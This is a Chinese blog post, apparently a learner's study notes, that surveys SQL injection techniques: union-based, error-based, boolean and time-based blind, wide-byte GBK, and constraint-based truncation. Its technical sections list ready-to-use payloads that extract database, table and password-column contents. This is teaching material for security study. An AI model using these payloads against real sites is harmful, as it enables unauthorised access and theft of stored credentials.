<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web," />










<meta name="description" content="前言 关于sql注入也了解了一些，也做了一些题。所以就想对简单的sql注入进行一些简单的总结，本人菜鸡，所以请各位大佬提出一些建议。">
<meta name="keywords" content="Web">
<meta property="og:type" content="article">
<meta property="og:title" content="菜鸡对sql注入的一些简单总结">
<meta property="og:url" content="http://yoursite.com/2018/03/31/菜鸡对sql注入的一些简单总结/index.html">
<meta property="og:site_name" content="The7sins">
<meta property="og:description" content="前言 关于sql注入也了解了一些，也做了一些题。所以就想对简单的sql注入进行一些简单的总结，本人菜鸡，所以请各位大佬提出一些建议。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-04-03T09:23:41.458Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="菜鸡对sql注入的一些简单总结">
<meta name="twitter:description" content="前言 关于sql注入也了解了一些，也做了一些题。所以就想对简单的sql注入进行一些简单的总结，本人菜鸡，所以请各位大佬提出一些建议。">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/03/31/菜鸡对sql注入的一些简单总结/"/>






  <script>
  (function(i,s,o,g,r,a,m){i["DaoVoiceObject"]=r;i[r]=i[r]||function(){(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;a.charset="utf-8";m.parentNode.insertBefore(a,m)})(window,document,"script",('https:' == document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/0f81ff2f.js","daovoice")
  daovoice('init', {
      app_id: "61988f7d"
    });
  daovoice('update');
  </script>


  <title>菜鸡对sql注入的一些简单总结 | The7sins</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
	<a href="https://github.com/The7sins"  class="github-corner" aria-label="View source on Github"><svg width="80" height="80" viewBox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">The7sins</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">来的人都是大佬</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/03/31/菜鸡对sql注入的一些简单总结/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="The7sins">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="The7sins">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">菜鸡对sql注入的一些简单总结</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-03-31T22:37:05+08:00">
                2018-03-31
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web安全/" itemprop="url" rel="index">
                    <span itemprop="name">Web安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><blockquote>
<p>关于sql注入也了解了一些，也做了一些题。所以就想对简单的sql注入进行一些简单的总结，本人菜鸡，所以请各位大佬提出一些建议。<br><a id="more"></a></p>
</blockquote>
<h1 id="什么是sql注入"><a href="#什么是sql注入" class="headerlink" title="什么是sql注入"></a>什么是sql注入</h1><p>sql注入就是一种通过操纵输入来修改后台sql语句以达到利用代码进行攻击目的的技术。攻击者通过影响传递给数据库的内容来修改sql自身的语法和功能，并且会影响到sql所支持的数据库和操作系统的功能和灵活性</p>
<h1 id="理解sql注入产生的过程"><a href="#理解sql注入产生的过程" class="headerlink" title="理解sql注入产生的过程"></a>理解sql注入产生的过程</h1><ul>
<li>如果web应用开发人员无法确保在将从web表单、cookie、输入参数等收到的值传递给sql查询（该查询在数据库上服务器上执行）之前已经对其进行过验证，通常会出现sql注入漏洞</li>
<li>如果攻击者能够控制发送给sql查询的输入，并且能操作该输入将其解析为代码而不是数据</li>
<li>如果web应用开发人员无法彻底理解与他们交互的基础数据库或者无法完全的理解并意识到所开发代码潜在的安全问题，那么就容易受到sql注入攻击<h1 id="一些常见的注入叫法"><a href="#一些常见的注入叫法" class="headerlink" title="一些常见的注入叫法"></a>一些常见的注入叫法</h1></li>
<li>POST注入</li>
<li>cookie注入</li>
<li>延时注入</li>
<li>搜索注入</li>
<li>base64注入：注入字符需要经过base64解码</li>
</ul>
<h1 id="发现sql注入"><a href="#发现sql注入" class="headerlink" title="发现sql注入"></a>发现sql注入</h1><p>这一部分以后在进行补充（皮这一下，我很快乐）</p>
<h1 id="利用sql注入"><a href="#利用sql注入" class="headerlink" title="利用sql注入"></a>利用sql注入</h1><h2 id="识别数据库"><a href="#识别数据库" class="headerlink" title="识别数据库"></a>识别数据库</h2><p>web应用技术将为我们提供第一步线索，如.asp和.net通常是使用Microsoft SQL Server作为后台数据库，而php应用则很有可能使用MySQL注入或PostgreSQL。如果应用是java编写的，那么很用有可能是Oracle或MySQL,而且底层操作系统也可以提供一些线索：安装IIS作为服务器平台很有可能使用的是SQL server，而运行Apache和PHP的Linux服务器则很有可能使用的是开源数据库，如MySQL或者PostgreSQL。</p>
<h3 id="非盲跟踪"><a href="#非盲跟踪" class="headerlink" title="非盲跟踪"></a>非盲跟踪</h3><h3 id="盲跟踪"><a href="#盲跟踪" class="headerlink" title="盲跟踪"></a>盲跟踪</h3><h2 id="基于联合查询的sql注入"><a href="#基于联合查询的sql注入" class="headerlink" title="基于联合查询的sql注入"></a>基于联合查询的sql注入</h2><ul>
<li>由于mysql_fetch_array函数只被调用了<br>一次，所以union select语句就只显示了前一个表的数据（即只显示了union select右边的数字串中的一些数字）显示第二个表的数据，那么我们只要让第一行查询的结果是空集（即union左边的select子句查询结果为空），那么我们union右边的查询结果自然就成为了第一行，就打印在网页上了，这个id他一般传的是数字，而且一般都是从1开始自增的，我们可以把id值设为非正数（负数或0），浮点数，字符型或字符串都行。要想union操作符正确工作，需满足两个条件：两个查询返回的列数必须相同（所以先用order by来查询列数–使用 order by 5正确   order by 6错误，就意味着查询中包含5列）   </li>
<li>了解一下mysql的系统函数<br>user()  当前使用者的用户名<br>database()  当前数据库名<br>version()  当前使用的数据库版本<br>concat()  连接一个或者多个字符<br>group_concat()  连接一个组的所有字符串，并以逗号分隔每一个数据（查询数据库的各种信息了（可以看到只有第2列和第3列的结果显示在网页上），所以我们就只能用2,3这个位置了，但是两个位置应该是不够用的，这时我们就用到数据库的连接函数了，常用的就concat和concat_ws,其中concat_ws的第一个参数是连接字符串的分隔符，还会用到group__concat(可以把查询出来的多行连接起来)）  </li>
<li>理解schema，sechmata，schema_name，table_schema<br>SCHEMATA表:储存mysql所有数据库的基本信息，包括数据库名，编码类型路径等，show databases的结果取之此表。<br>TABLES表:储存mysql中的表信息，（当然也有数据库名这一列，这样才能找到哪个数据库有哪些表嘛）包括这个表是基本表还是系统表，数据库的引擎是什么，表有多少行，创建时间，最后更新时间等。show tables from schemaname的结果取之此表。<br>COLUMNS表：提供了表中的列信息，（当然也有数据库名和表名称这两列）详细表述了某张表的所有列以及每个列的信息，包括该列是那个表中的第几列，列的数据类型，列的编码类型，列的权限，注释等。是show columns from schemaname.tablename的结果取之此表。  </li>
<li>下面我们就要查询敏感信息了，就要用到上面所说的系统函数了<br>and 1=2 union select 1,version(),database()可以爆出当前使用的版本和数据库名<br>and 1=2 union select 1,2,schema_name from information_schema.schemata limit 1,1 %23爆出数据库名，依次使用limit2，1往下爆库名，也可以使用group_concat函数全部爆出来 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata%23 。<br>我们假设其中有flag库<br>and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where schema_name=’flag’ 爆出flag库下的所有的表，假设其中有flagtable表<br>and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name =’flagtale’爆出flagtable下的所有字段，假设有name和password字段<br>and 1=2 union select 1,2,group_concat(name,password) from flag.flagtable爆出flag下的flagtable表的name和password的内容</li>
</ul>
<h2 id="基于错误回显的sql注入"><a href="#基于错误回显的sql注入" class="headerlink" title="基于错误回显的sql注入"></a>基于错误回显的sql注入</h2><p>SQLServer</p>
<p>一、利用错误消息提取信息</p>
<p>　　输入 ‘having 1=1 –（having一般要与group by一起来使用，group by是用来进行分组的，having后面是用来进行判断的），如果网站存在使数据库回显到页面上，那么可以通过页面的回显得到一些想要的数据库字段。通过一次次错误回显来查询出当前表的所有列名（直到没有错误为止）。</p>
<p>　　‘having 1=1 –</p>
<p>　　‘group by 爆出来的字段 having 1=1 –  </p>
<p>二、利用数据类型提取数据</p>
<p>　　如果试图将一个字符与非字符比较，或者将一个字符串转换为另一个不兼容的类型时，那么SQL编辑器将会抛出异常：</p>
<p>　　TOP关键字在SQL语言中用来限制返回结果集中的记录条数;详细请点我</p>
<p>　　select * from users where username=’root’ and password=’password’ and 1 &gt; (select top 1 username from users where username not in (‘root’))</p>
<p>　　如果不嵌入子查询，也可以使数据库报错，这就用到了SQLServer的内置函数CONVERT或者CASE函数，这两个函数的功能是：将一种数据类型转换为另一种数据类型）例如：</p>
<p>　　select * from user where username=’root’ and password=’root’ and 1=convert(int,(select top 1 users.username from users))</p>
<p>　　如果感觉递归麻烦，可以通过使用FOR XML PATH语句查询的数据生成XML：</p>
<p>　　select * from users where username=’root’ and password=’root’ and 1=CONVERT(int,select stuff(select  ‘,’ + users.username, ‘|’ + users.password from users for xml path(‘ ‘)),1,1,’ ‘)))</p>
<p>MySQL</p>
<p>　　在SQLServer中通过报错会回显一些错误信息，在Mysql中却没有提示错误消息；但是可以通过其他方式进行提取：</p>
<p>　　通过updatexml函数：select *from message where id=1 and updatexml(1,(concat(0x7c,(select @@version))),1);</p>
<p>　　通过extractvalue函数：select * from message where id=1 and extractvalue(1,concat(0x7c,(select user())));</p>
<p>　　通过floor函数：select <em> from message where id=1 union select </em> from (select count(<em>), concat(floor(rand(0)</em>2),(select user())) a from information_schema.tables group by a)b</p>
<h2 id="基于盲注的sql注入，分时间盲注和布尔型的盲注"><a href="#基于盲注的sql注入，分时间盲注和布尔型的盲注" class="headerlink" title="基于盲注的sql注入，分时间盲注和布尔型的盲注"></a>基于盲注的sql注入，分时间盲注和布尔型的盲注</h2><h3 id="基于布尔型的sql盲注："><a href="#基于布尔型的sql盲注：" class="headerlink" title="基于布尔型的sql盲注："></a>基于布尔型的sql盲注：</h3><p>返回的界面只有两种情况，即TRUE和FALSE，这样说并不是很准确，因为SQL查询无非就这两种情况，应该说是盲注的时候你只能得到一个正常的页面或者是什么页面的不存在，甚至你在查询表的记录过程也不会有显示。</p>
<p>首先了解几个函数</p>
<p>length()返回字符串的长度</p>
<p>substr()截取字符串</p>
<p>ascii()返回字符的ascii码</p>
<p>爆数据库的路径<br>and ascii(substr(@@datadir,1,1)）&gt;69 %23然后使用二分法一步一步确定。</p>
<p>爆所有的数据库名</p>
<p>and ascii(substr((select schema_name from information_schema.schemata limit 2,1),1,1))&gt;101 %23 limit函数爆出的是第二个数据库的第一个字符，同上，假设其中一个库名为flag</p>
<p>爆数据库表名</p>
<p>and (ascii(substr((select table_name from information_schema.tables where table_schema=’flag’ limit 0,1),1,1)))&gt;100 %23假设其中一个表名为flagtable</p>
<p>爆出数据库的列名</p>
<p>and (ascii(substr((select column_name from information_schema.columns where table_name=’flagtable’ limit 0,1),1,1)))&gt;100 %23,假设其中列名为name和password</p>
<p>爆出列里的数据内容<br>and ascii(substr((select group_concat(name,password) from flag.flagtable limit 0,1),1,1))&gt;48 %23</p>
<p>这样我们就一步一步的爆出数据库的信息了</p>
<h3 id="基于时间的盲注"><a href="#基于时间的盲注" class="headerlink" title="基于时间的盲注"></a>基于时间的盲注</h3><p>web页面的返回值只有一种，true，无论输入任何值，它的返回都会按正确的来处理。加入特定的时间函数，通过查看是web页面返回的时间差来判断注入的语句是否正确</p>
<p>sleep()函数</p>
<p>执行将程序（进程）挂起一段时间</p>
<p>if（expr1，ecpr2，expr3）判断语句</p>
<p>爆库名</p>
<p>and if(ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1))&gt;100,1,sleep(3))%23使用二分法，一步一步爆出数据库名，假设其中有一数据库名为flag</p>
<p>爆表名</p>
<p>and if(ascii(substr((select table_name from information_schema.tables where table_schema=’flag’ limit 1,1) ,1,1))&gt;101,1,sleep(3)) %23假设有一表名为flagtable</p>
<p>爆列名</p>
<p>and if(ascii(substr((select column_name from information_schema.columns where table_name=’flagtable’ limit 1,1) ,1,1))&gt;100,1,sleep(3)) %23，假设爆出列名为name和password</p>
<p>爆表中的内容</p>
<p>and if(ascii(substr((select group_concat(name,password) from flag.flagtable limit 0,1) ,1,1))&gt;48,1,sleep(3)) %23</p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><ul>
<li>gbk占用两字节  </li>
<li>ASCII占用一字节  </li>
<li>php中编码为gbk，函数执行添加的是ASCII编码，mysql默认字符集是gbk的宽字节字符集  </li>
<li>%DF’ ：会被PHP当中的addslashes函数转义为“%DF\’” ，“\”既URL里的“%5C”，那么也就是说，“%DF’”会被转成“%DF%5C%27”倘若网站的字符集是GBK，MYSQL使用的编码也是GBK的话，就会认为“%DF%5C%27”是一个宽字符。也就是“縗’”   </li>
<li>输入%df和函数执行添加的%5C，被合并成%df%5C。由于GBK是两字节，这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应，所以被当成无效字符。</li>
</ul>
<h2 id="基于约束条件的sql注入"><a href="#基于约束条件的sql注入" class="headerlink" title="基于约束条件的sql注入"></a>基于约束条件的sql注入</h2><ul>
<li>在处理SQL中的字符串时，字符串末尾的空格将会被删除</li>
<li>在任意INSERT查询中，SQL会根据varchar(n)来限制字符串的最大长度，也就是说，如果字符串的长度大于“n”个字符的话，那么仅使用字符串的前“n”个字符。 </li>
</ul>
<p>现在，假设一个易受攻击的网站使用了前面提到的PHP代码来处理用户的注册和登录。为了入侵任意用户的帐户(就本例来说，用户名为“vampire”)，只需使用用户名“vampire[一些空白字符]1”和一个随机密码进行注册即可。对于选择的用户名，前25个字符应该只包含vampire和空白字符。这样做的好处是，将有助于绕过检查特定用户名是否已存在的查询 </p>
<h2 id="基于user-agent的sql注入"><a href="#基于user-agent的sql注入" class="headerlink" title="基于user-agent的sql注入"></a>基于user-agent的sql注入</h2><h2 id="基于feferer的sql注入"><a href="#基于feferer的sql注入" class="headerlink" title="基于feferer的sql注入"></a>基于feferer的sql注入</h2><h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2>
      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web/" rel="tag"><i class="fa fa-tag"></i> Web</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/04/25/第一次周记-1/" rel="prev" title="第一次周记">
                第一次周记 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">The7sins</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#什么是sql注入"><span class="nav-number"></span> <span class="nav-text">什么是sql注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#理解sql注入产生的过程"><span class="nav-number"></span> <span class="nav-text">理解sql注入产生的过程</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#一些常见的注入叫法"><span class="nav-number"></span> <span class="nav-text">一些常见的注入叫法</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#发现sql注入"><span class="nav-number"></span> <span class="nav-text">发现sql注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#利用sql注入"><span class="nav-number"></span> <span class="nav-text">利用sql注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#识别数据库"><span class="nav-number">1.</span> <span class="nav-text">识别数据库</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#非盲跟踪"><span class="nav-number">1.1.</span> <span class="nav-text">非盲跟踪</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#盲跟踪"><span class="nav-number">1.2.</span> <span class="nav-text">盲跟踪</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于联合查询的sql注入"><span class="nav-number">2.</span> <span class="nav-text">基于联合查询的sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于错误回显的sql注入"><span class="nav-number">3.</span> <span class="nav-text">基于错误回显的sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于盲注的sql注入，分时间盲注和布尔型的盲注"><span class="nav-number">4.</span> <span class="nav-text">基于盲注的sql注入，分时间盲注和布尔型的盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#基于布尔型的sql盲注："><span class="nav-number">4.1.</span> <span class="nav-text">基于布尔型的sql盲注：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基于时间的盲注"><span class="nav-number">4.2.</span> <span class="nav-text">基于时间的盲注</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#宽字节注入"><span class="nav-number">5.</span> <span class="nav-text">宽字节注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#原理"><span class="nav-number">5.1.</span> <span class="nav-text">原理</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于约束条件的sql注入"><span class="nav-number">6.</span> <span class="nav-text">基于约束条件的sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于user-agent的sql注入"><span class="nav-number">7.</span> <span class="nav-text">基于user-agent的sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基于feferer的sql注入"><span class="nav-number">8.</span> <span class="nav-text">基于feferer的sql注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#二次注入"><span class="nav-number">9.</span> <span class="nav-text">二次注入</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">The7sins</span>

  
</div>

<!--
<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>


-->

        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

  
   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/src/fireworks.js"></script>

</body>
</html>
